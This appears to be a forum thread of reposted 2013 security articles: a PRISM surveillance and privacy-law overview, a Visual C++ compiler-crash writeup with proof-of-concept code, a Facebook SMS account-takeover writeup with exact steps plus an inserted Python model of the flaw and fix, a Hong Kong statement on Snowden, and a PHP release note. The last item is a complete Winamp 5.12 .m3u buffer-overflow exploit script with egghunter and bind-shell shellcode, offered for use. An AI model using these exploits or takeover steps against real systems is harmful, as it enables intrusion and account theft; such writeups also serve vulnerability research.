The document states that PRISM became popular during the Arab Spring when it was used to profile individuals considered dangerous for the US. The 41 slides composing the presentation, classified as Top Secret, claim that the “collection directly from the servers” of major US IT service providers remarks the need for the information for security purpose.

The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives.

“Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans,” Director of National Intelligence James R. Clapper said.

All the companies reported in the Top Secret document denied any knowledge of the secret program, following principal comments on the disclosure:

“Google cares deeply about the security of our users’ data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a back door for the government to access private user data,” stated Google.

“We do not provide any government organization with direct access to Facebook servers,” “When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law,” declared Joe Sullivan, Chief Security Officer for Facebook.
“We have never heard of PRISM,” “We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order,” said Steve Dowling, a spokesman for Apple.

[h=1]Is the PRISM Program Legal? Law and Regulations[/h]

The digital exposure of Internet users has reached a level unthinkable until a few years ago. This aspect has had mainly positive effects but it has also increased the surface of attack for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up.

The number of laws that are trying to regulate our digital existence is increasing. There is a need to reduce the gaps in legislation and enforcement that open you up to online data breaches, stalking, identity theft and disclosure of user’s personal information. It must be considered that these laws can have a major impact on our life; every ordinary operation could be started with something simple such as a phone call.

Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate technology introduction, following a short list:

[h=3]Digital Life[/h]

Laws and proposals are designed to protect user’s privacy in the online and mobile spheres.

- The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation.
- The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement.
- The Children’s Online Privacy Protection Act or COPPA protects children under 13 from the online collection of personal information.
- The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information.

[h=3]Digital Commerce[/h]

The massive introduction of technology in commerce has requested the definition of strict laws to avoid the abuse of information on consumer habits and activities. Following is a list of laws that seek to address a number of major issues related to consumer privacy rights:

- The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed.
- The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devices and would require that app developers provide greater transparency about their data collection practices.
- The Location Privacy Protection Act of 2011 addresses the risks for stalking posed by cell phones loaded with GPS and apps that gather information about a user’s location.
- The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats and the sharing of Internet traffic information between the US government and IT and manufacturing companies.

[h=3]Work and Employment[/h]

Laws and regulation that affect users in the workplace during their ordinary activity:

- The Social Media Privacy Act is for the protection of online privacy for job seekers.
- The Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment.

[h=3]Personal Information[/h]

No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history.
- The Foreign Intelligence Surveillance Act (FISA) Amendments Act of 2008/FISA Amendments Act Reauthorization Act of 2012 passed in 1978 but has undergone some major restructuring in recent years. It prescribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information. It also provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first time under the Patriot Act expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017. Under this act, the US Government is authorized to conduct surveillance of Americans’ international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties.
- The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private.
- The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials; with respect to the original proposal, it has been integrated with social media sites.
- The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restrict business associates’ use of protected health information, improve congressional oversight of HIPAA, and provide additional measures that would protect patient privacy and safety when using health information technology.

[h=3]Back to the PRISM Case[/h]

After the analysis of principal laws and proposals, users can have a clearer idea on what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by “Section 215 of the Patriot Act, which authorizes the existence of special procedures, authorized by the FISA court to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-mail, chat, voice and video, videos and photos”.

It expands the law enforcement power to spy on every US citizen, including permanent residents, without providing explanation, starting the investigation on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement could keep track of every activity made by a suspect, including communication and Internet activities.

Many citizens and lawyers can consider Section 215 unconstitutional, claiming that it violates the Fourth Amendment by allowing the government to effect Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might be used to obtain information that affects privacy interests other than those protected by the First Amendment, but let’s think of medical records. Also the Fourth and Fifth Amendments are violated by provision of such data by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised.
[h=1]The Outsourcing of Intelligence: Risks and Benefits[/h]

The recent data leak on US Top Secret program PRISM by an intelligence contractor raised a debated discussion on the introduction of outsourcing for personnel to hire for top-secret programs. It was an inevitable consequence of the growth of the security sector and of the increased number of tasks needed by governments to ensure homeland security and the security of principal productive sectors.

Edward Snowden has worked at Booz Allen Hamilton and other intelligence contractors. His career started at the Central Intelligence Agency with various technical assignments. In an official statement, the company Booz Allen declared:

“Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm’s code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter.”

Snowden is one of the thousands of private intelligence contractors hired by the US Government to respond to the increased necessity of security to prevent terrorist attacks. The majority of these professionals play critical roles within the principal security agencies in the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civil government analysts in accessing a huge quantity of secret and top-secret documents.
According to the official reveal of the Office of the Director of National Intelligence, almost one in four intelligence workers were employed by contractors, and around 70% of the intelligence community’s secret budget is spent for outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security but it also represents a serious risk for the possibility of infiltration of spies and whistleblowers.

The AP reported that nearly 500,000 contractors have access to the government’s top secret programs. “Of the 4.9 million people with clearance to access “confidential and secret” government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper’s office. Of the 1.4 million who have the higher “top secret” access, 483,000, or 34 percent, work for contractors.”

In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors assumed a crucial role within the nation’s intelligence infrastructure. “The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape,” he said.

To give an idea of the number of private contractors that worked for US intelligence agencies, The Post reported that 1,931 private companies worked on reserved counterterrorism operations and many other campaigns to empower homeland. The operations were conducted all over the country in around 10,000 locations. During the last year, the principal emergency was related to the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against National networks.
The massive introduction of technology has made necessary the recruitment of a large number of technicians who have been entrusted with the delicate task of protecting the country’s infrastructure such as communication networks, grids, and satellite systems. A recent trend that emerged to respond to continuous cyber attacks is the involvement in offensive operations of skilled professionals and hackers hired to instruct cyber units. These same hackers have been used to perform vulnerability assessments and penetration testing on critical infrastructures.

[h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h]

One of the most alarming risks related to a Top Secret program such as PRISM is represented by the possible disclosure of the information gathered. Unauthorized access to the information could give a foreign government a meaningful advantage in terms of intelligence. Foreign hackers could have access to a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must be considered that a possible attack could be taken advantage of by insiders and cyber spies.

The case of Bradley Manning proved to the public opinion the devastating effect that the revelation of the government’s secret documents could have on homeland security. Starting with the consideration that nearly 854,000 people ordinarily manage top-secret security clearances, it is possible to understand the surface of attacks for the “machine” of Intelligence. Each of these individuals could be a target for state-sponsored hackers and could itself represent an insider threat.

The disclosure of the PRISM program is a demonstration that principal US intelligence agencies and law enforcement weren’t able to protect Top Secret information from disclosure.
The information has been acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations by foreign governments. “The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses.”

If persistent collectors such as the Chinese government or a hostile country like Iran or North Korea could have access to a surveillance system, it could be a tragedy for the country. Suddenly the country will have no secret for the adversary, and every sector will be deeply impacted. Foreign governments aren’t unique in their interest in access to the surveillance system. Terrorists belonging to groups like Al Qaeda and also cyber criminals could breach the defense of Intelligence archives.

The development and deployment of a massive surveillance system is a critical choice. The government in fact must be sure to be able to prevent foreign intrusions and to avoid the creation of maybe a single point of failure for the overall security of the country.

[h=1]Countermeasures[/h]

There are various ways to limit the exposure of our digital experience to surveillance and monitoring activities. The US Government and law enforcement could have access to email accounts such as Gmail messages, spy on user communication and discover their habits. Following are a few simple suggestions to avoid monitoring:

[h=3]How to anonymize the user’s Internet experience?[/h]

Tor Network

On the Internet, every machine is identified by its IP address that could be hidden by using anonymizing services and networks such as I2P and Tor network. Usually, the anonymizing process is based on the concept of distribution of routing information. Tor software and the Tor open network help users to avoid surveillance during web browsing, hiding IP address and other identifying information if properly configured.
The anonymity is granted through the bouncing of traffic among randomly routed proxy computers before sending it on to its real destination and through the message encryption. Every node of the network manages minimal information to route the packets to the next hop without conserving history on the path. Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing.

Web Proxy

To anonymize a user’s identity and its IP address, it is possible to use anonymizing services. The simplest way to do it is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use; just by typing a website URL the user could visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript. The principal drawback is related to data speed and difficulty to access some contents like videos. Of course be aware of the proxy you use, as you could come across honeypots set up to spy on you.

VPN

Virtual Private Networks represent a valid solution to anonymously surf the Internet. Premium VPNs’ paid services dedicate proxy servers for their customers. All client traffic is tunneled to the VPN server via this encrypted connection and from there to the web. This results in actually using the server’s IP to browse the web, instead of the client’s. The principal question is related to the attitude of some VPN providers to maintain server logs that could reveal user’s habits. Of course principal service providers deny it but it is a concrete risk.

All the above solutions slow down surfing speed due to the application of tunneling processes and the implementation of cryptographic algorithms.

[h=3]Keep private your chat conversations[/h]

For every communication channel, there is a more or less secure solution.
The events demonstrated that most popular conventional instant messaging services like those offered by Google, Yahoo or Microsoft keep track of your conversations. A typical solution to protect the content of chat communications is to encrypt the messages end to end, an operation that could be done using a self-made chat client that enciphers the content to transmit or choosing a chat extension available on the Internet.

A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR (“off the record”). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. Using the protocol, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install an instant messaging software that supports it, such as Pidgin for Windows and Linux systems.

[h=3]Keep private your calls[/h]

Telephone conversations are exposed to government monitoring, and PRISM is just the last demonstration of the control exercised by authorities for security reasons. Since a few years ago, users were convinced that Internet-based telephony applications represented the most secure way to make calls that avoid wiretapping. Skype was considered the most secure channel since its acquisition by Microsoft. Of course, I’m speaking of a commercial product, avoiding express reference to the various crypto-mobile and applications commercialized at high cost by many security firms.

Today one of the most interesting solutions provided on the market is Silent Circle. It implements an “end-to-end” encryption, making it impossible for telephone companies to access the user’s call.
As reported by the Washington Post: “The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any ‘back doors.’”

Another interesting software having similar functionalities and that has been independently audited to make sure there are no back doors is Redphone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. taxpayers courtesy of the Open Technology Fund.

[h=3]Protecting emails[/h]

Another critical aspect is the protection of user’s mail. Commercial PGP or free GPG are considered the standard for email security, and both can be used to encrypt and decrypt messages, avoiding surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL-licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP. Current versions of PGP (and Veridis’ Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems.

The main problem for GPG is that novice users could find it complicated to use and not portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features.

[h=1]Conclusions[/h]

The existence of the PRISM program doesn’t surprise security experts or the common people. From a recent survey, the majority is willing to sacrifice their privacy for homeland security. In the PRISM story, I found personally concerning the approach of the principal IT companies that professed totally different privacy respect.

My last thought is for surveillance operations elsewhere on the planet, which are often synonymous with censorship and persecution.
The laws and regulations of many countries accept these practices to protect the interest of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings?

[h=1]References[/h]

- Edward Snowden is the responsible for disclosure of PRISM program
- Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian
- NSA slides explain the PRISM data-collection program - The Washington Post
- NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian
- The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post
- http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html
- InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P
- NSA Leak Highlights Key Role Of Private Contractors
- The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org
- Five ways to stop the NSA from spying on you

Source: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes
13. [h=2]Crashing the Visual C++ compiler[/h]

In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit.

After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this).

[h=2]Heads up![/h]

If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article:

"Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]."
In other words (keep in mind I'm not a build service expert, but this is how I understand it):

- Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server.
- It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server.
- You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers' machines, etc.

To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges.

[h=2]The code that crashes[/h]

The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future):

#include <stdio.h>

class A { public: int alot[1024]; };
class B : public A { public: int more[1024]; };
class C : public A { public: int more[1024]; };
class DA : public B,C { public: int much[1024]; };
class DB : public B,C { public: int much[1024]; };

#define X(a) \
  class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \
  class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; }

#define Y(a) \
  X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \
  X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA)

Y(D);
Y(DAAAAAAAA);
Y(DAAAAAAAAAAAAAAAA);
X(DAAAAAAAAAAAAAAAAAAAAAAAA);

// Funny story. Without global it doesn't compile (LNK1248).
// But with global it seems to overflow, and it compiles OK.
int global[0x12348];

DAAAAAAAAAAAAAAAAAAAAAAAAAA x;

int main(void) {
  printf("%p\n", &x);
  printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing
                                         //      DAA...AA_more to different
                                         //      amount of 'A'

  // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01):
  // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler.
  // (compiler file 'msc1.cpp', line 1420)
  //  To work around this problem, try simplifying or changing the program near the locations listed above.
  // Please choose the Technical Support command on the Visual C++
  //  Help menu, or open the Technical Support help file for more information
  // Internal Compiler Error in cl.exe.  You will be prompted to send an error report to Microsoft later.
  //
  // (2154.dd4): Access violation - code c0000005 (first chance)
  // First chance exceptions are reported before any exception handling.
  // This exception may be expected and handled.
  // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0
  // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0         nv up ei pl nz na pe cy
  // cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
  // MSVCR100!_VEC_memcpy+0x5a:
  // 73170bb7 660f7f6740      movdqa  xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=????????????????????????????????
  //
  return 0;
}

As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know!

[h=2]Vendor communication timeline[/h]

2012-09-30: Report sent to Microsoft (DoS only PoC).
2012-10-01: Received ACK + request for further clarification.
2012-10-03: Received information that the crash appears to be exploitable.
2012-10-03: Sent clarification.
2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue.
2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug.
2012-11-06: Received ACK + information that the bug will be discussed again with the product team.
2012-12-18: Received "we are still working on it".
2013-01-31: Sent a ping.
2013-06-03: Sent a ping.
2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note.
2013-06-21: Sent a heads up with this blog post.
2013-06-24: Published this blog post.

[h=2]Update[/h]

A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers

Source: gynvael.coldwind//vx.log
14. [h=2]Hijacking a Facebook Account with SMS[/h]

This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy.

Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address.

The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target’s doesn’t trigger an error.

To exploit this bug, we first send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified.

Note: You may have to reauth after submitting the request, but the password required is yours, not the target’s.

An SMS is then received with confirmation. Now we can initiate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we’re done. The account is ours.

[h=4]Fix[/h]

Facebook responded by no longer accepting the profile_id parameter from the user.

[h=4]Timeline[/h]

23rd May 2013 - Reported
28th May 2013 - Acknowledgment of Report
28th May 2013 - Issue Fixed

[h=4]Note[/h]

The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue.

Source: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms
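The confirm_phone bug above is an authorization failure: the account to link is read from a client-controlled field instead of the session. The following is an added example (Python, not Facebook's code or the author's) that models the flow with a vulnerable handler next to a hardened one that binds the link to the authenticated user, as the fix does. The class, method and field names, the in-memory store and the sample phone numbers are all assumptions constructed for the example.

```python
import secrets
from typing import Dict, List, Optional, Tuple


class PhoneLinkService:
    """Toy model of the phone-confirmation flow. All names here are
    assumptions for this example, not the real endpoint's code."""

    def __init__(self, profile_ids: List[int]) -> None:
        # profile_id -> linked phone number (None = nothing linked)
        self.phones: Dict[int, Optional[str]] = {pid: None for pid in profile_ids}
        # verification code -> phone number that texted the shortcode
        self.pending: Dict[str, str] = {}
        # (session user, profile_id they tried to pass) pairs worth alerting on
        self.tamper_log: List[Tuple[int, str]] = []

    def inbound_sms(self, phone: str) -> str:
        """A phone texts the shortcode and gets an 8-character code back.
        Only the phone number is known at this point, never the account."""
        code = secrets.token_hex(4)  # 8 hex characters
        self.pending[code] = phone
        return code

    def confirm_vulnerable(self, session_user: int, form: Dict[str, str]) -> int:
        """The flawed handler: the account to link comes from the form's
        profile_id; the session identity (__user in the post) is ignored."""
        phone = self.pending.pop(form.get("code", ""), None)
        if phone is None:
            return 400
        target = int(form["profile_id"])
        if target not in self.phones:
            return 404
        self.phones[target] = phone
        return 200

    def confirm_fixed(self, session_user: int, form: Dict[str, str]) -> int:
        """Hardened handler: the link is always made to the session user.
        A profile_id that disagrees with the session can only come from a
        tampered form, so the request is refused, the code is burned and the
        attempt is recorded for detection."""
        phone = self.pending.pop(form.get("code", ""), None)
        if phone is None:
            return 400
        supplied = form.get("profile_id")
        if supplied is not None and supplied != str(session_user):
            self.tamper_log.append((session_user, supplied))
            return 403
        self.phones[session_user] = phone
        return 200

    def account_for_phone(self, phone: str) -> Optional[int]:
        """Which account a phone-based password reset would land on."""
        for pid, linked in self.phones.items():
            if linked == phone:
                return pid
        return None


def demo() -> Tuple[Optional[int], Optional[int]]:
    """Send the same tampered request to both handlers and report which
    account the requester's phone resolves to afterwards."""
    requester, other = 1001, 2002
    phone = "+44 7700 900123"  # constructed sample number

    def tampered_form(code: str) -> Dict[str, str]:
        return {"code": code, "profile_id": str(other)}

    svc = PhoneLinkService([requester, other])
    svc.confirm_vulnerable(requester, tampered_form(svc.inbound_sms(phone)))
    before_fix = svc.account_for_phone(phone)  # the other account

    svc = PhoneLinkService([requester, other])
    svc.confirm_fixed(requester, tampered_form(svc.inbound_sms(phone)))
    after_fix = svc.account_for_phone(phone)  # nothing linked

    return before_fix, after_fix


if __name__ == "__main__":
    print(demo())  # (2002, None)
```

The reset-by-SMS step that follows in the post only works because the linking step accepted a foreign profile_id; once the link is bound to the session, a reset for the other account never reaches the requester's phone.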
  15. HKSAR Government issues statement on Edward Snowden
***************************************************

The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden:

Mr Edward Snowden left Hong Kong today (June 23) on his own accord for a third country through a lawful and normal channel.

The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong.

The HKSAR Government has already informed the US Government of Mr Snowden's departure.

Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong.

Ends/Sunday, June 23, 2013
Issued at HKT 16:05

Source: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm
  16. Stupid topic => cobra89 - ban (3 days). Useless posts that have nothing to do with the subject - warn.
  17. [h=1]PHP 5.5.0 Release Announcement[/h]
The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes.

The key features of PHP 5.5.0 include:
- Added generators and coroutines.
- Added the finally keyword.
- Added a simplified password hashing API.
- Added support for constant array/string dereferencing.
- Added scalar class name resolution via ::class.
- Added support for using empty() on the result of function calls and other expressions.
- Added support for non-scalar Iterator keys in foreach.
- Added support for list() constructs in foreach statements.
- Added the Zend OPcache extension for opcode caching.
- The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality.
- A lot more improvements and fixes.

Changes that affect compatibility:
- PHP logo GUIDs have been removed.
- Windows XP and 2003 support dropped.
- Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules.

For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0.

For a full list of changes in PHP 5.5.0, see the ChangeLog.

Source: PHP: PHP 5.5.0 Release Announcement
  18. [h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h]

# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check for bind shell on port 28876
#

import struct

header = "#EXTM3U\n"
header += "#EXTINF:1234,Pwnage Rock\n"

# NTDisplayString
egghunter = (
    "\x90" * 64 +
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +
    "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
    "\x77\x30\x30\x74" +  # w00t
    "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +
    "\x90" * 30
)

junk = "\x41" * 262 + "\x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
    "w00tw00t" +
    "\x90" * 239 +
    "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
    "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
    "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
    "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
    "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
    "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
    "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
    "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
    "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
    "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
    "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
    "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
    "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
    "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
    "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
    "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
    "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
    "\x44\x83\x55"
)

# 022B368C , call ecx , C:\Program Files\Winamp\pxsdkpls.dll
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but
# this is what the fuzzer found first so... wtf
wtf = "\x43\x43\x43\xB0"

f = open("boom.m3u", "w")
f.write(header + junk + shellcode + ret + wtf)
f.close()

print "Created boom.m3u"
print "1. Open Winamp"
print "2. Drag boom.m3u into Winamp window"
print "3. Check for bind shell on port 28876"

Source: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow
